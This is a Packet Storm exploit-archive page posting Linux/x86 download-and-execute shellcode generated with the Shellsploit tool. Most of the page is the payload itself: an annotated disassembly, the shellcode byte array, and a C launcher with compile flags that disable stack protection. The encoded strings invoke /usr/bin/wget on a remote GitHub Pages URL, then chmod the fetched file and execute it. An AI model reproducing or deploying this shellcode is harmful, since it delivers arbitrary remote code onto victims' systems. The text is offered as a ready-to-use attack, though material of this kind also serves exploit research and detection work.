exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 Download And Execute Shellcode

Linux/x86 Download And Execute Shellcode
Posted Feb 1, 2016
Authored by B3mB4m

Linux/x86 download and execute shellcode.

tags | x86, shellcode
systems | linux
SHA-256 | 66cd841782c96253b0b053bf3ce187bac96ac3e1aa19c4714d4dbc495041b236

Linux/x86 Download And Execute Shellcode

Change Mirror Download
/*
--------------------------------------------------------------------------------------------------------

[+] Author : B3mB4m
[~] Contact : b3mb4m@protonmail.com
[~] Project : https://github.com/b3mb4m/Shellsploit
[~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu
[~] Poc : http://imgur.com/hHB4yiQ


#We are still working on ROP Chain, stay tuned :)


"""
You can convert it an elf file:

https://www.virustotal.com/en/file/93c214f7b4362937f05f5732ba2f7f1db53e2a5775ab7bafdba954e691f74c82/analysis/1454113925/

If you want test:
Important : your filename len must be one byte(Weird bug I'll fix it
soon lol).
Default settings for http://b3mb4m.github.io/exec/h
Source codes : b3mb4m.github.io/exec/hello.asm
"""



00000000 31C0 xor eax,eax
00000002 B002 mov al,0x2
00000004 CD80 int 0x80
00000006 31DB xor ebx,ebx
00000008 39D8 cmp eax,ebx
0000000A 743B jz 0x47
0000000C 31C9 xor ecx,ecx
0000000E 31DB xor ebx,ebx
00000010 31C0 xor eax,eax
00000012 6A05 push byte +0x5
00000014 89E1 mov ecx,esp
00000016 89E1 mov ecx,esp
00000018 89E3 mov ebx,esp
0000001A B0A2 mov al,0xa2
0000001C CD80 int 0x80
0000001E 31C9 xor ecx,ecx
00000020 31C0 xor eax,eax
00000022 50 push eax
00000023 B00F mov al,0xf
00000025 6A68 push byte +0x68
00000027 89E3 mov ebx,esp
00000029 31C9 xor ecx,ecx
0000002B 66B9FF01 mov cx,0x1ff
0000002F CD80 int 0x80
00000031 31C0 xor eax,eax
00000033 50 push eax
00000034 6A68 push byte +0x68
00000036 89E3 mov ebx,esp
00000038 50 push eax
00000039 89E2 mov edx,esp
0000003B 53 push ebx
0000003C 89E1 mov ecx,esp
0000003E B00B mov al,0xb
00000040 CD80 int 0x80
00000042 31C0 xor eax,eax
00000044 40 inc eax
00000045 CD80 int 0x80
00000047 6A0B push byte +0xb
00000049 58 pop eax
0000004A 99 cdq
0000004B 52 push edx
0000004C 6865632F68 push dword 0x682f6365
00000051 682F2F6578 push dword 0x78652f2f
00000056 68622E696F push dword 0x6f692e62
0000005B 6869746875 push dword 0x75687469
00000060 68346D2E67 push dword 0x672e6d34
00000065 6862336D62 push dword 0x626d3362
0000006A 89E1 mov ecx,esp
0000006C 52 push edx
0000006D 6A74 push byte +0x74
0000006F 682F776765 push dword 0x6567772f
00000074 682F62696E push dword 0x6e69622f
00000079 682F757372 push dword 0x7273752f
0000007E 89E3 mov ebx,esp
00000080 52 push edx
00000081 51 push ecx
00000082 53 push ebx
00000083 89E1 mov ecx,esp
00000085 CD80 int 0x80
*/

//Project : https://github.com/b3mb4m/Shellsploit
//This file created with shellsploit ..
//30/01/2016 - 02:59:21
//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell

unsigned char shellcode[] =
"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31\xc0\x50\xb0\x0f\x6a\x68\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50\x6a\x68\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52\x68\x65\x63\x2f\x68\x68\x2f\x2f\x65\x78\x68\x62\x2e\x69\x6f\x68\x69\x74\x68\x75\x68\x34\x6d\x2e\x67\x68\x62\x33\x6d\x62\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";

int main(void){
(*(void(*)()) shellcode)();
}

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close